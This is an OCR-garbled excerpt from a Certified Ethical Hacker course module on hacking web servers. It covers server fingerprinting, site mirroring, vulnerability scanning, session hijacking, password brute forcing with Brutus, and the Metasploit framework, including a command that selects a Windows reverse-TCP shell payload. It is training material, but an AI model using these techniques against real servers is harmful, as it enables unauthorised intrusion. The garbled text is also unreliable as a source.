  • 43. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker r iE T C K A F T Se a rch W e b by Domain Explore 1,045.745 web sites visited by users of the Netcraft Toolbar 3rd August 2012 S e a rc h : search tips j site contains j«‫ ׳‬microsoft ^ lookup! e x a m p le : s it e c o n t a in s .n e tc r a ft.c o m Results for microsoft Found 252 sites Site Site Report First seen 1. w w w .m icro s o ft.co m 2. s u p p o r t.m ic r o s o ft.c o m 3. te c h n e t.m ic r o s o ft .c o m 4. w in d ov< s.m icrosoft.co m 5. m s d n .m ic r o s o ft .c o m 6. o ffic e .m ic r o s o ft.c o m 7. s o c ia l.t e c h n e t .m ic ro s o ft .c o m 8. a n s w e r s .m ic r o s o ft.c o m 9. v 4 w w .u p d a te.m icro s o ft.c o m 10. s o c ia l.m s d n .m ic r o s o ft .c o m a m m 0 a £1 a £1 a 0 Netblock OS citrix n e t s c a le r a u g u s t 1995 m ic ro s o ft corp o c to b e r 1997 m ic ro s o ft corp unknow n a u g u s t 1999 m ic ro s o ft corp citrix n e t s c a le r ju n e 1998 m ic ro s o ft corp S e p t e m b e r 1998 m ic ro s o ft corp window s s e r v e r 2 0 0 8 citrix n e t s c a le r n o v e m b e r 1998 m ic ro s o ft corp unknow n a u g u st 2008 m ic ro s o ft corp citrix n e t s c a le r au g u st 2009 m ic ro s o ft lim ite d window s s e r v e r 2 0 0 8 m a y 2007 m ic ro s o ft corp window s s e r v e r 2 0 0 8 a u g u st 2008 m ic ro s o ft corp citrix n e t s c a le r citrix n e t s c a le r 11. g o .m ic r o s o ft.c o m a n o v e m b e r 2001 m s h o tm a il 12. w in d o w s u p d a te .m ic r o s o ft.co m a a a m fe b u a r y 1 9 9 9 m ic ro s o ft corp w in d ow s s e r v e r 2 0 0 8 fe b u a r y 2 0 0 5 m ic ro s o ft corp w in d ow s s e r v e r 2 0 0 8 13. u p d a t e .m ic r o s o ft.c o m 14. w w w .m ic ro s o fttra n s la to r.c o m 15. s e a r c h .m ic r o s o ft .c o m n o v e m b e r 2008 a k a m a i te c h n o lo g ie s lin u x ja n u a r y 1997 a k a m a i in t e r n a t io n a l b .v lin u x 16. w w .m ic r o s o fts t o r e .c o m a n o v e m b e r 2008 d ig ita l riv e r ir e la n d ltd. f5 b ig ‫ ־‬ip 17. lo g in .m ic r o s o fto n lin e .c o m £1 IB d ecem b er 2010 m ic ro s o ft corp w in d ow s s e r v e r 2 0 0 3 o c to b e r 2 0 0 5 m ic ro s o ft corp w in d ow s s e r v e r 2 0 0 8 18. w e r.m ic r o s o ft.c o m F IG U R E 1 2 .1 4 : W e b s e r v e r F o o t p r in t in g Module 12 Page 1642 Ethical Hacking and Countermeasures Copyright © by EC-COUIlCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 44. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Webserver Footprinting Tools httprecon 7.3 - http://www.nytimes.com:80/ File C o n fig u ra tio n F in g e rp rin tin g R ep crtin g CEH I—I° H elp Ta*get (Sun ONE W eb Server 6.1) | h t b :/ / ^ | www.nytimes.com : 180 0 H TTP/1.1 2 0 O 0 K D ace: Thu, 1 Oct 2 1 09:34:37 G T 1 02 M expires: Thu, 0 D 1 9 16:00:00 G T 1 ec 9 4 M carhe-control: no-cache pragm no-cache a: Sec-Cookie: ALT_ID 007f010021bb479dd5aa00SS; Expires = 09:34:37 G T Path= D ain‫. ־‬nytim M; /; om e3.com ; Sec-cookie: adxcs= path=/; do!rain=.nytim ca -; es. m Matehfct (352 Implementations) | Fingerprint Details | Report Preview | a Oracle Application Server 10g 10.1.2.2.0 7.0 Sun Java System W eb Server • ID S e r v e Background ' C 2 Errte* 0* copy Copyright (c) 2003 by Gibson Research Corp. Serv2r Query I paste an Internet | Q8A/Help 1111 SSm | server UR_ or IP address here (example: www.microsdt.com): |www.google.coml Quety The S ever w ^ W hen an Internet URL ‫ זה‬IP has been provided above, piess this button to initiate a query of the specified server. S w vei query pcocessng (3 Abyss V Internet Server Identifica.ion Utility, v l .02 Personal Security Freeware by Stev Gibson Steve Name •S V V ‫י ^־‬ ID Serve GET existing j GET lo n g e q u e s tj GET non-ex sting] GET wrong p rotocol) 2.5.0.0 X1 Apache 2.0.52 Apache 2.2.6 ru— 1 n c n______________________ — Server gws Content-Length: 221 X‫־‬X S S ‫־‬Protectior: 1 mode-block ; X‫־‬Frome‫־‬Options: SAMEORIGIN Connection: close F ■ Ready The seivei identified Ise* a s : http://www.computec.ch (4 Goto ID Serve web page http://www. grc.com Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. W e b S e r v e r F o o t p r i n t i n g T o o ls W e have already discussed about the Netcraft tool. In addition to the Netcraft tool, there are two more tools that allow you to perform web server footprinting. They are Httprecon and ID Serve. H ttprecon ( ^ ' Source: http://www.computec.ch Httprecon is a tool for advanced web server fingerprinting. The httprecon project is doing some research in the field of web server fingerprinting, also known as http fingerprinting. The goal is the highly accurate identification of given httpd implementations. This software shall improve the ease and efficiency of this kind of enumeration. Module 12 Page 1643 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 45. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker httprecon 7.3 - http://www.nytimes.com:80/ F ile C o n fig u r a tio n F in g e r p r in t in g R e p o r t in g — ‫ם‬ H e lp T a r g e t ( S u n O N E W e b S e r v e r G .1 ) http:/‫/׳‬ ▼I G E T e x is tin g A n a ly z e 80 |w w w . n y t im e s . c o m | G E T lo n g r e q u e s t | G E T n o n - e x istin g G E T w r o n g p r o t o c o l | H E A D e x is tin g | O P T I O N S c o m m o n HTTP/1.1 200 O K Date: Thu, 11 Oct 2012 09:34:37 G T M Server: Apache expires: Thu, 01 Dec 1994 16:00:00 G T M cache-control: no-cache pragma: no-cache Set-Cookie: ALT_ID=007f010021bb479ddSaa005S; Expires=Fri, 11 Oct 2013 09:34:37 GM Path=/; Domain=.nytimes.com T; ; Set-cookie: adxca=-; path=/; domain=.nytimes.com Vary: Host M a t c h lis t ( 3 5 2 Im p le m e n ta t io n s ) | F in g e r p rin t D e t a ils | R e p o r t P r e v i e w N am e M I H its M a tch % O r a c l e A p p lic a t io n S e r v e r 1 0 g 1 0 .1 .2 .2 .0 58 H22 S u n J a v a S y s t e m W e b S e r v e r 7 .0 57 8 0 .2 8 1 6 3 0 1 4 0 8 4 5 1 # A b y s s 2 .5 .0 .0 X 1 56 7 8 .8 7 3 2 3 3 4 3 6 6 1 3 7 A p a c h e 2 .0 .5 2 56 7 8 .8 7 3 2 3 3 4 3 6 6 1 3 7 A p a c h e 2 .2 .6 56 7 8 .8 7 3 2 3 3 4 3 6 6 1 3 7 EC /‫׳‬ 8 1 .6 3 0 1 4 0 8 4 5 0 7 0 4 0 7 0 000,1 70‫ ־‬OCC1 □7 V ‫׳‬ n c n Ready. FIGURE 12.15: Httprecon Screenshot ID Serve Source: http://www.grc.com ID Serve is a simple Internet server identification utility. ID Serve can almost always identify the make, model, and version of any website's server software. This information is usually sent in the preamble of replies to web queries, but it is not shown to the user. ID Serve can also connect with non-web servers to receive and report that server's greeting message. This generally reveals the server's make, model, version, and other potentially useful information. Simply by entering any IP address, ID Serve will attempt to determine the associated domain name. Module 12 Page 1644 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 46. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker G ID Serve ID Serve I n t e r n e t S e r v e r I d e n t i f i c a t i o n U t ilit y , v 1 .02 B a ck g ro u n d | S e rv e r Q u e ry P e r s o n a l S e c u r it y F r e e w a r e b y S t e v e G ib s o n Copyright (c) 2003 by Gibson Research Corp. Q & A / H e lp Enter or copy I paste an Internet server URL or IP address here (example: www.microsoft.com): 1 w ww.google.com | Query The Server When an Internet URL or IP has been provided above, press this button to initiate a query of the specified server. ^ Server query processing: S e rv e r: gw s C o n t e n t - L e n g t h : 221 X - X S S - P r o t e c t i o n : 1; m o d e = b l o c k X - F r a m e - O p tio n s : S A M E O R I G I N C o n n e c tio n : c lo s e (4 Copy The server identified itself as : |gws__________________ Goto ID Serve web page Exit FIGURE 12.16: ID Serve Module 12 Page 1645 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 47. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Webserver Attack Methodology: Mirroring a Website CEH Mirror a website to create a complete profile of the site's directory structure, files structure, external links, etc Search for comments and other items in the HTML source code to make footprinting activities more efficient Use tools HTTrack, WebCopier Pro, BlackWidow, etc. to mirror a website H Site mirroring in progress [2/14 (+13), 327948 bytes] - [Test ProjecLMrttJ E*€ Freferences Mirro 13 ii, local Disk <( log Window Help Pa‫׳*־‬g HTM fife L w m r til . MyWebSlte* ‫ש‬ ProgramRes )It) *. ProgramFits WKi i 111 lh«s til , t Windows i NTUSSR.DAT 1 1• •* >local Disk *D : «; M D RW Drivt ‫<&י‬ VD :N«wVolum» < F1 320.26*8 laved 2nr22» Tiro. 08* tf.19KB/») -a.rfe-rdLe Ac*ve correct !one4 1 1 W a ic rtB ! 0 0 14 HrcdcdaMd. 7 ;Men*: Ji M « J□ h :/ w wh c .c m ttp / w . ttro k o Copyright © by E - t i c l All Rights Reserved. Reproduction is Strictly Prohibited. GGlni. W e b S e r v e r A tta c k M e th o d o l o g y : M i r r o r i n g a W e b s it e — Website mirroring is a method of copying a website and its content onto another server. By mirroring a website, a complete profile of the site's directory structure, file structure, external links, etc. is created. Once the mirror website is created, search for comments and other items in the HTML source code to make footprinting activities more efficient. Various tools used for web server mirroring include HTTrack, W ebripper 2.0, W inW SD , Webcopier, and Blackwidow. C Source: http://www.httrack.com HTTrack is an offline browser utility. It allows you to download a World W ide W eb site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative linkstructure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. Module 12 Page 1646 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 48. Ethical Hacking and Countermeasures Hacking Webservers H Exam 312-50 Certified Ethical Hacker Site mirroring in progress [2/14 (+13), 327948 bytes] - [Test Project.whtt] File Preferences terror B j j Local Disk <C:> 0 CEH-Tools j H J . dell a i. B B t g) ••Jj a ‫׳‬j J inetpub Intel MyWebSites Program Files Program Files (x86) & J 1 Users a Windows L Q NTUSER.DAT Log Window JHelp In progress: Parang HTML He Information Bytes saved: 320.26KB Time: 2min22s Transferrate: OB/s (1.19MB/s) Active connections: 1 Links scanned: Files written: Fles updated: Errors: 2/14 (.13) 14 0 0 [Actions a a Local Disk <D:> DVD RW Drive <E:> El , . New Volume <F:> ;B ack | Next > Cancel Help FIGURE 12.17: Mirroring a Website Module 12 Page 1647 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 49. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker W e b s e rv e r A tta c k M e th o d o lo g y : V u ln e ra b ility S c a n n in g CEH Perform vulnerability scanning to identify weaknesses in a network and determine if the system can be exploited J Sniff the network traffic to find out active systems, netw ork services, applications, and vulnerabilities present Use a vulnerability scanner such as HP Weblnspect, Nessus, Zaproxy, etc. to find hosts, services, and vulnerabilities J Test the web server infrastructure for any misconfiguration, outdated content, and known vulnerabilities Copyright © by K-€M ICil. All Rights Reserved. Reproduction Is Strictly Prohibited. W eb S e rv e r S c a n n in g A tta c k M e th o d o lo g y : V u ln e ra b ility Vulnerability scanning is a method of determining various vulnerabilities and misconfigurations of a target web server or network. Vulnerability scanning is done with the help of various automated tools known as vulnerable scanners. Vulnerability scanning allows determining the vulnerabilities that exist in the web server and its configuration. Thus, it helps to determine whether the web server is exploitable or not. Sniffing techniques are adopted in the network traffic to find out active systems, network services, applications, and vulnerabilities present. Also, attackers test the web server infrastructure for any misconfiguration, outdated content, and known vulnerabilities. Various tools are used for vulnerability scanning such as HP Weblnspect, Nessus, Paros proxy, etc. to find hosts, services, and vulnerabilities. N essus Source: http://www.nessus.org Nessus is a security scanning tools that scan the system remotely and reports if it detects the vulnerabilities before the attacker actually attacks and compromises them. Its five features includes high-speed discovery, configuration auditing, asset profiling, sensitive data discovery, patch management integration, and vulnerability analysis of your security posture with features Module 12 Page 1648 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 50. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker that enhance usability, effectiveness, efficiency, and communication with all parts of your organization. FIGURE 1 2 .1 8 : N essus S c re e n s h o t Module 12 Page 1649 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 51. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker W e b s e r v e r A tta c k M e th o d o lo g y : C EH S e s s io n H ija c k in g Sniff valid session IDs to gain unauthorized access to the Web Server and snoop the data Use session hijacking techniques such as session fixation, session sidejacking, Cross-site scripting, etc. to capture valid session cookies and IDs Use tools such as Burp Suite, Hamster, Firesheep, etc. to automate session hijacking l‫ ־‬l ° W burp suite free edition v1A01 J curp intruder repeater target window about s:arinei - intrude! f repeats! | sequence! [ ceccflet [ comparer options ' alerts ig not found items hiding CSS image and gereral ainarr content 1iS-g .l«-e=pcn=e= h d ng ?mrt/folders http:A conom dime 5 indiatime s o le i host h«p/«*d*orc 0 9 0 hltpVJedition cnn m °‫ •ם־‬Irr* - -— w"1 - iVedifion c http ;‫׳ ״‬ MIME typi HTML‫־‬ /»8n«nr5s1/3<ls1»3mcs; add item to 9cope cpiaortnis branch arfrvely scan this branch passively scan this branch engagement took [pro version onlf] compare site maps eipand branch 5: ‫ר0נפ‬ oxpana rcquoctca noms delete branch copy URL# in this blanch copy iioks in tnis oranch save selected items reaueat ‫ |~־¥י‬params headers [ hex | T / . • L«»«nc.'* 1 1 / m r 1 ‫ ׳‬brea*r1ng_n*v•/3 . 0 /banner. ntral ?c m h d » c * 11 T P / 1 .1 8c: e d it io n .c n n .co » ec-Affe&t: K c s illd / S .O 1 Vind0¥3 I1T 6 .2 ; W0V61; c v : J S .0 l cko/:0100101 F ir e f o x / 15.0.1 I Accept: tr x t/ j« v o 3 c c ip c , t e x t/ h tn L , «pp Li.Cflt.ion/1 te xrol, tex t/x m l, I : ‫| ]׳ ־‬ | 0 matches http ://p o rtsw ig g er. n et Note: For complete coverage of Session Hijacking concepts and techniques refer to Module 11: Session Hijacking Copyright © by EG-Gtltncil. All Rights Reserved. Reproduction is Strictly Prohibited. W e b 1 1 S e r v e r A t t a c k M e t h o d o lo g y : S e s s io n H ija c k in g Session hijacking is possible once the current session of the client is identified. Complete control of the user session can be taken over by the attacker once the user establishes authentication with the server. W ith the help of sequence number prediction tools, attackers perform session hijacking. The attacker, after identifying the open session, predicts the sequence number of the next packet and then sends the data packets before the legitimate user sends the response with the correct sequence number. Thus, an attacker performs session hijacking. In addition to this technique, you can also use other session hijacking techniques such as session fixation, session sidejacking, cross-site scripting, etc. to capture valid session cookies and IDs. Various tools used for session hijacking include Burp Suite, Hamster, Firesheep, etc. Burp Suite ___Source: http://portswigger.net Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. The key components of Burp Suite include proxy, scanner, intruder tool, repeater tool, sequencer tool, etc. Module 12 Page 1650 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 52. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker 0- ^ 1 ‫־‬ burp suite free edition v1.4.01 x burp intruder repeater window about target spider scanner [ intruder | repealer [‫ ־‬sequencer | decoder [ comparer [ options | alerts site map scope | Filter hiding not found items; hiding CSS, image and general binary content hiding 4xx responses; hiding empty folders *‫ ־‬http7/economictimes indiatimes.com 9 http://edition.cnn.com 0□ ‫. ־‬el( D‫׳‬ o 2]20 - host method GET □ URL params status 20 0 1element/ssi/ads.iframes/ length I MIME tj typi 676 HTM L □ http: ‫׳‬edition.cnn.com .element add item to scope spider this branch actively scan this branch O CDBU O D cn 0‫ □ ־‬E L I 0 O eu ‫־‬ passively scan this branch engagement tools [pro version only] ► compare site maps expand branch sponse expand requested Items M‫']־‬ delete branch T request params ■headers | hex | ' / . e le r o e n c / 3 3 i/ in c l/ b r e a k in g _ n e v s / 3 . O / b a n n e r. h c m l? c s iID = c s il copy URLs In this branch copy links in this branch * ‫ ־‬L J SH T P / 1 .1 3c: save selected Items c lc o / :0 1 0 0 i0 1 e d ic io n .c n n .c o m e r- A g e n c: A ccep C : H o z illa / 5 .0 ( W in d o w s NT 6 .2 ; W O W 64; c v :i5 .0 ) F i r e f o x / 1 5 .0 .1 c e x c / ja v M c r lp c , c e x c / h c m l, a p p llc a C lo n / x m l, c e x c / x n il. FIGURE 1 2 .1 9 : B u rp S u ite S c re e n s h o t Module 12 Page 1651 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 53. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker W e b s e r v e r A tta c k M e th o d o lo g y : H a c k in g W e b P a s s w o r d s Brutus - AET2 - www.hoobie.net/brutus - (January 2000) Use password cracking techniques such as brute force attack, dictionary File lo o ls Target 1~ I ‫ם‬ x Help |10.0017| Type I HTTP (Basic Auth) attack, password guessing to crack W ebserver passwords Use tools such as Brutus, ▼| Start | Stop | Deaf | Connection Options HTTP (Basic) Options THC-Hydra, etc. Method | HEAD r 10 Timeout 1" j - Connections *‫ ־‬J~ " Use Proxy Define W KeepAlive ]▼J Authentication Options W Use Username User File Sngle User useistxt Pass Mode |Word List Browse | File | words.txt Positive Authentication Results Target 10.0 0 1 7 / 10.0 0 1 7 / _U ype HTTP (Basic Auth) HTTP (Basic Auth) I Username admin backup I Password academic Located and nstaled 1 authentication plugns Imtialisng... Target 10.0 0 1 7 venfied Opened user fie containing 6 users Opened password fie conta*wvg 818 Passwords Mawmum number of authentication attempts vul be 4908 Engagng target 10.0.017 with HTTP (Basic AuthJ T n■ i •irofrt amo irw Timeout Reject AuthSeq Throttle Quick Kill h ttp ://w w w . hoobie. n et Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. W e b S e rve r A tta c k M e th o d o lo g y : H a c k in g W e b P a ssw o rd s One of the main tasks of any attacker is password hacking. By hacking a password, the attacker gains complete control over the web server. Various methods used by attackers for password hacking include password guessing, dictionary attacks, brute force attacks, hybrid attacks, syllable attacsk, precomputed hashes, rule-based attacks, distributed network attacks, rainbow attacks, etc. Password cracking can also be performed with the help of tools such as Brutus, THC-Hydra, etc. O :‫כב‬ 1 Brutus Source: http://www.hoobie.net Brutus is an online or remote password cracking tools. Attackers use this tool for hacking web passwords without the knowledge of the victim. The features of the Brutus tool are been explained briefly on the following slide. Module 12 Page 1652 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 54. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Brutus - AET2 ‫ ־‬www.hoobie.net/brutus ‫( ־‬January 2000) F i le Jo o ls T a rg e t _ ‫ם‬ H e lp |1 0 .0 .0 .1 7| T y p e | H T T P ( B a s i c A u (h ) ▼~| S ta r( j S to p C le ar C o n n e c tio n O p tio n s P o rt 10 1 80 T im e o u t 10 r T r U s e P ro x y D e fin e H T T P (B a s ic ) O p tio n s M e th o d W [H E A D K e e p A liv e A u th e n tic a tio n O p tio n s— U s e U se rn a m e U s e r F ile I- S in g le U s e r Pass M ode users.txt B ro w s e f B ro w s e P a s s File P o s itiv e A u th e n tic a tio n R e s u lts T ype U sern am e P a ssw o rd 1 .0 .1 / 0 .0 7 T arg e t H T T P (B a s ic A u th ) ad m in a c a d e m ic 1 0 .0 .0 .1 7 / H T T P (B a s ic A u th ) b ackup L o c a t e d a n d installed 1 a u th e n tic a tio n plug-ins a Initialising... T a r g e t 1 0 .0 .0 .1 7 verifie d O p e n e d u se r file c o n ta in in g 6 users. O p e n e d p a s s w o r d file c o n ta in in g 8 1 8 P a s s w o r d s . M ax im um n u m b e r of a u th e n tic a tio n atte m p ts will b e 4 9 0 8 E n g a g in g ta rg e t 1 0 .0 .0 .1 7 w ith H T T P ( B a s i c A u th ) T rm «n 1 - a r Jr r .1► ‫•־‬ T im e o u t R e je c t A u th S e q T h ro ttle Q u ic k Kill FIGURE 1 2 .2 0 : B ru tu s S c re e n s h o t Module 12 Page 1653 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 55. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker M o d u le F low C EH Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. M o d u le F lo w The tools intended for monitoring and managing the web server can also be used by attackers for malicious purposes. In this day and age, attackers are implementing various methods to hack web servers. Attackers with minimal knowledge about hacking usually use s for hacking web servers. Webserver Concepts Webserver Attacks Webserver Attack Tools Attack Methodology 0 Webserver Pen Testing -y Patch M anagement Webserver Security Tools o m — m — Counter-measures This section lists and describes various web server attack tools. Module 12 Page 1654 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 56. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Webserver Attack Tools: Metasploit The Metasploit Framework is a penetration testing to o lkit, exploit development platform, and research tool that includes hundreds of working remote exploits for a variety of platforms It supports fully automated exploitation of web servers, by abusing known vulnerabilities and leveraging weak passwords via Telnet, SSH, HTTP, and SNM ® ‫״‬jet (J)metasploit ft V ModutM Tag* Q Atporto ‫־‬ T a li 0 wm Target Syitttn Statu* • MOkom**4 • I S— md • I O ptrabng Sy*t»rm (Top ») • U M olW oM cm M • M m • MKnaPnw LOOM PTOftCt Activity (24 Noun) N ctw oft S n v K t i (Top S) • 2tC DCIW C • III M S K M tt • )7 HETBOSS***(** • n usn«‫׳‬us(B vv^ • M USAOPSffwctt h ttp ://w w w .m eta sp lo it.c o m Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited W e b S e r v e r A t t a c k T o o ls : M e t a s p lo it Source: http://www.metasploit.com The Metasploit framework makes discovering, exploiting, and sharing vulnerabilities quick and relatively painless. It enables users to identify, assess, and exploit vulnerable web applications. Using VPN pivoting, you can run the NeXpose vulnerability scanner through the compromised web server to discover an exploitable vulnerability in a database that hosts confidential customer data and employee information. Your team members can then leverage the data gained to conduct social engineering in the form of a targeted phishing campaign, opening up new attack vectors on the internal network, which are immediately visible to the entire team. Finally, you generate executive and audit reports based on the corporate template to enable your organization to mitigate the attacks and remain compliant with Sarbanes Oxley, HIPAA, or PCI DSS. Metasploit enables teams of penetration testers to coordinate orchestrated attacks against target systems and for team leads to manage project access on a per-user basis. In addition, Metasploit includes customizable reporting. M etasploit enables you to: © Complete penetration test assignments faster by automating repetitive tasks and leveraging multi-level attacks Module 12 Page 1655 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 57. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker © Assess the security of web applications, network and endpoint systems, as well as email users © Emulate realistic network attacks based on the leading Metasploit framework with more than one million unique downloads in the past year © Test with the world's largest public database of quality assured exploits © Tunnel any traffic through compromised targets to pivot deeper into the network © Collaborate more effectively with team members in concerted network tests © Customize the content and template of executive, audit, and technical reports (J metasploit l« M lp n O l S*M *o«W 0 Targ et S y s te m S U M S Tag* V Cwnpognt O R rpo rtt ~ TmJ‫ ״‬Q O p eratin g S y s te m s [T o p » ) • M onN nocm H M • M O n to x M • 1■SmM • 2 •Konca P m t r • • 2 •*0‫ וו״0*ף‬ffntwHM 1 •loom) • 1 •HP ***ClOOtO Protect Activity (24 Hours) Ntwr Services (Top ‫)צ‬ e ok • • • • • 270 DCERPC Server* 114 •SMB STOKT* 37-N€TBOSSr<vcr* » ‫־‬MS‫ ׳‬W ‫״‬ T *S(RV S^vcr* 20 USAO? Serve** FIGURE 1 2 .2 1 : M e ta s p lo it S c re e n s h o t Module 12 Page 1656 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 58. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker M etasploit A rchitecture C EH (•rtifwtf I til1 1 Nm Im (4 Rex Custom plug-ins ^ F ra m e w o rk -B a s e ^ A k" : In te rfa c e s m fs c o n s o le m s fc li m s fw e b P rotocol Tools F ra m e w o rk -C o re K 7 S e c u rity Tools M o d u le s ‫ץ‬ E xp lo its P ayload s W e b S ervices E ncoders In te g ra tio n m s fw x NOPS m s fa p i A u x ilia ry Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. M e t a s p lo it A r c h ite c tu r e The Metasploit framework is an open-source exploitation framework that is designed to provide security researchers and pen testers with a uniform model for rapid development of exploits, payloads, encoders, NOP generators, and reconnaissance tools. The framework provides the ability to reuse large chunks of code that would otherwise have to be copied or reimplemented on a per-exploit basis. The framework was designed to be as modular as possible in order to encourage the reuse of code across various projects. The framework itself is broken down into a few different pieces, the most low-level being the framework core. The framework core is responsible for implementing all of the required interfaces that allow for interacting with exploit modules, sessions, and plugins. It supports vulnerability research, exploit development, and the creation of custom security tools. Module 12 Page 1657 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 59. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Libraries ‫ץ‬ A Rex Custom plug-ins < ^ :‫<־‬ / Protocol Tools Framework-Core Framework-Base ^ <•: Interfaces mfsconsole msfcli msfweb Modules Security Tools Web Services Integration Exploits Payloads Encoders msfwx NOPS msfapi Auxiliary FIGURE 1 2 .2 2 : M e ta s p lo it A rc h ite c tu re Module 12 Page 1658 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 60. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker M etasploit Exploit M odule C EH It is the basic module in Metasploit used to encapsulate an exploit using which users target many platforms with a single exploit This module comes with simplified meta-information fields Using a Mixins feature, users can also modify exploit behavior dynamically, brute force attacks, and attempt passive exploits S te p s t o e x p lo it a s y s te m f o l l o w t h e M e t a s p lo it F r a m e w o r k C o n fig u r in g A c tiv e E x p lo it _ S e le c tin g a T a rg e t * & Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. M e t a s p lo it E x p lo it M o d u le - 1 1 1 ii The exploit module is the basic module in Metasploit used to encapsulate an exploit using which users target many platforms with a single exploit. This module comes with simplified meta-information fields. Using a Mixins feature, users can also modify exploit behavior dynamically, perform brute force attacks, and attempt passive exploits. Following are the steps to exploit a system using the Metasploit framework: © Configuring Active Exploit © Verifying the Exploit Options © Selecting a Target © Selecting the Payload © Launching the Exploit Module 12 Page 1659 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 61. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker M etasploit Payload M odule j Payload module establishes a com m unication channel between the M etasploit fram ew ork and the victim host J It combines the arbitrary code tha t is executed as the result o f an exploit succeeding J To generate payloads, first select a payload using the command: 9S C o m m a n d P ro m p t m sf > m sf p a y lo a d (3 h e ll_ r e v e r s e _ tc p ) use U sage: w in d o w s / s h e ll_ r e v e r s e _ t c p g e n e ra te G e n e ra te s a > g e n e ra te -h [o p t io n s ] p a y lo a d . -b < o p t> The l i s t o f c h a ra c te rs to -e < o p t> The nam e o f th e -h H e lp -o < o p t> a v o id : m o d u le , x 0 0 x ff' to u s e . b an n e r. A com m a VAR=VAL s e p a ra te d < o p t> NOP s le d -t < o p t> The o u tp u t p a y lo a d (s h e ll l i s t o f o p t io n s in fo rm a t. -s m sf en cod er le n g t h . ty p e : re v e rs e tc p ) ru b y , p e r i, c , o r ra w . > Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. M e t a s p lo it P a y lo a d M o d u le The Metasploit payload module offers shellcode that can perform a number of interesting tasks for an attacker. A payload is a piece of software that lets you control a computer system after its been exploited. The payload is typically attached to and delivered by the exploit. An exploit carries the payload in its backpack when it break into the system and then leaves the backpack there. With the help of payload, you can upload and download files from the system, take screenshots, and collect password hashes. You can even take over the screen, mouse, and keyboard to fully control the computer. To generate payloads, first select a payload using the command: Module 12 Page 1660 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
